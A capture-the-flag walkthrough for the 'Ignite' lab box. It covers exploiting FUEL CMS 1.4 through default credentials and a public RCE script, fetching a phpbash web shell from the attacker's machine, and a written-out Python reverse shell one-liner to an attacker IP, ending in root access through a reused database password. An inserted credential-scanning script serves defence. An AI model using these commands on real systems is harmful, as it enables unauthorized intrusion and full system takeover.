Ignite

  • nmap
  • searchsploit
  • python
  • netcat

Start with an nmap scan: $ sudo nmap -A -oA nmap 10.10.194.158

The only open port is 80, an Apache/2.4.18 web server. View the web page in a browser and we find it’s the default page for FUEL CMS 1.4, which also gives us some basic info about the CMS.

A quick Gobuster scan gives us nothing particularly useful: $ gobuster dir -u http://10.10.194.158 -w /usr/share/wordlists/dirb/common.txt

While Gobuster was running, read the CMS page. We find many config files are located in “fuel/application/config/” (such as database.php and config.php), and near the bottom it mentions a login page, /fuel, and gives default creds. Check that page and we can log in with them, with full admin rights!

Browsing the Dashboard we find a few Upload areas. These could be promising.

Before going into that, start simply. Checking Searchsploit with $ searchsploit fuel gives us “fuelCMS 1.4.1 - Remote Code Execution”. Sounds good. Copy it to our working directory with $ searchsploit -m linux/webapps/47138.py

Edit the file so the URL in the Python script matches the box. You’ll also need to make sure Burp Suite is open, and turn off Intercept; alternatively, remove the two references to the proxy in the script.

Then run the Python script (using Python 2, as the script is incompatible with Python 3 - $ python 47138.py). You’ll be presented with a cmd: prompt. Try some things, such as cmd:ls and cmd:whoami, to confirm you’re in - note you’ll have to scroll up past the rubbish to get the actual result.

This shell is horrible, though, so let’s try and upgrade it. There is a browser-based php shell called phpbash, available at https://github.com/Arrexel/phpbash/blob/master/phpbash.php. Download the raw script to your machine with wget, set up a local server with $ python3 -m http.server 4444, then download the file to the remote machine using cmd:wget <your-THM-IP>:4444/phpbash.php. Then, in a browser, visit http://10.10.194.158/phpbash.php and you get a better shell.

We can further improve the shell by making it a Python one, using a script from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#python. Change the script to include your IP, set up a netcat listener on your machine on port 4242 with $ nc -lvnp 4242, and when you run it (in the phpbash shell - it won’t work in the cmd one) your netcat will give you a shell.

This is the Python reverse shell code, run from the phpbash prompt: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.83.23",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

This shell can be further upgraded, first by running $ python3 -c 'import pty;pty.spawn("/bin/bash")', then $ export TERM=xterm, backgrounding this shell with Ctrl-Z, then $ stty raw -echo; fg. This gives us a nice, stable, interactive shell :)

Now we can get the first flag with www-data@ubuntu:/var/www/html$ cat /home/www-data/flag.txt. However, access to root ($ ls /root) is unsurprisingly denied.

We’ll need to privesc. $ sudo -l and $ sudo -i give us nothing, and no SUID binaries are found with $ find / -perm -u=s -type f 2>/dev/null

Let’s check the config files mentioned earlier, especially as one of them mentioned usernames and passwords. Change directory with $ cd fuel/application/config, and then search all the files for the phrase “password” using grep: $ grep -ni password *

One result looks interesting, line 80 of “database.php”: database.php:80: 'password' => 'mememe',

$ cat database.php and have a read about line 80 - it suggests the password is for root!
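As an added example from the defender's side (not part of the original walkthrough), here is a small Python scanner that does what the grep above does more systematically: it walks a config directory, reports hardcoded, non-empty credential values in PHP config arrays, and notes whether each file is world-readable. The database.php it scans is constructed here to mirror the entry quoted above.

```python
import os
import re
import stat
import tempfile

# Matches PHP array entries such as  'password' => 'mememe',  capturing key and value.
CRED_RE = re.compile(r"""['"](password|passwd|pass|secret)['"]\s*=>\s*['"]([^'"]*)['"]""", re.I)

def scan_config_dir(config_dir):
    """Return findings for hardcoded, non-empty credentials in *.php files.

    Each finding is (relative path, line number, key, value, world_readable)."""
    findings = []
    for root, _dirs, files in os.walk(config_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            world_readable = bool(os.stat(path).st_mode & stat.S_IROTH)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for key, value in CRED_RE.findall(line):
                        if value:  # an empty default value is not a finding
                            rel = os.path.relpath(path, config_dir)
                            findings.append((rel, lineno, key.lower(), value, world_readable))
    return findings

# Constructed sample, modelled on the FUEL CMS database.php entry found in the walkthrough.
SAMPLE_DATABASE_PHP = """<?php
$db['default'] = array(
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'fuel_schema',
);
"""

def demo():
    """Write the constructed config to a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "database.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_DATABASE_PHP)
        os.chmod(path, 0o644)  # world-readable, as web-root config files often are
        return scan_config_dir(tmp)

if __name__ == "__main__":
    for rel, lineno, key, value, wr in demo():
        # Redact the value when reporting; the location is what an admin needs to fix.
        print(f"{rel}:{lineno}: hardcoded '{key}' (world-readable: {wr})")
```

A finding that is both hardcoded and world-readable is the condition this box relies on; the fix is to move the secret out of the web root and tighten the file mode.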

Try it with $ su root and the password, and success! We get a # shell, and # whoami confirms we’re root.

Now simply # cat /root/root.txt.